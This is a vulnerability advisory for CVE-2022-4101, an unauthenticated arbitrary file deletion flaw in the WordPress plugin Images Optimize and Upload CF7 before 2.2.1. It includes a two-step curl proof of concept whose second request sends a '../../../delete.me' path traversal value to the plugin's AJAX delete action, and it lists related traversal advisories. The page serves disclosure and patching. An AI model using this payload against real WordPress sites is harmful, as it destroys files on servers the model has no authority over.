Images Optimize and Upload CF7 < 2.2.1 – Unauthenticated Arbitrary File Deletion | CVE 2022-4101 | Plugin Vulnerabilities

Description

The plugin does not validate the file to be deleted via an AJAX action available to unauthenticated users, which could allow them to delete arbitrary files on the server via path traversal attack.

Proof of Concept

1. Install contact-form-7 (dependency)

2. Install the vulnerable plugin (images-optimize-and-upload-cf7 version 2.1.3)

3. Invoke curl to create a potentially missing upload directory (required for the exploit to work):

curl 'https://example.com/wp-admin/admin-ajax.php?action=yr_api_uploader'

4. Invoke the following curl command to delete the delete.me file at the root of the blog:

curl 'https://example.com/wp-admin/admin-ajax.php?action=yr_api_delete' \
    --data 'file=../../../delete.me'

Affects Plugins

images-optimize-and-upload-cf7

Fixed in 2.2.1

References

CVE

Classification

Type

TRAVERSAL

OWASP top 10

CWE

CVSS

10.0 (critical)

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

2ce4c837-c62c-41ac-95ca-54bb1a6d1eeb

Timeline

Publicly Published

2022-12-21 (about 3 years ago)

Added

2022-12-21 (about 3 years ago)

Last Updated

2025-06-02 (about 7 months ago)

Other

Published

Title

Published

2023-11-13

Title

Frontend File Manager < 22.7 - Editor+ Arbitrary File Download

Published

2022-10-20

Title

Welcart eCommerce < 2.7.8 - Unauthenticated Arbitrary File Access

Published

2022-03-27

Title

Admin Word Count Column <= 2.2 - Unauthenticated Arbitrary File Read

Published

2022-10-28

Title

Ultimate Member < 2.5.1 - Contributor+ LFI via Traversal

Published

2023-03-20

Title

All-In-One Security (AIOS) < 5.1.5 - Admin+ Arbitrary File/Folder Access via Traversal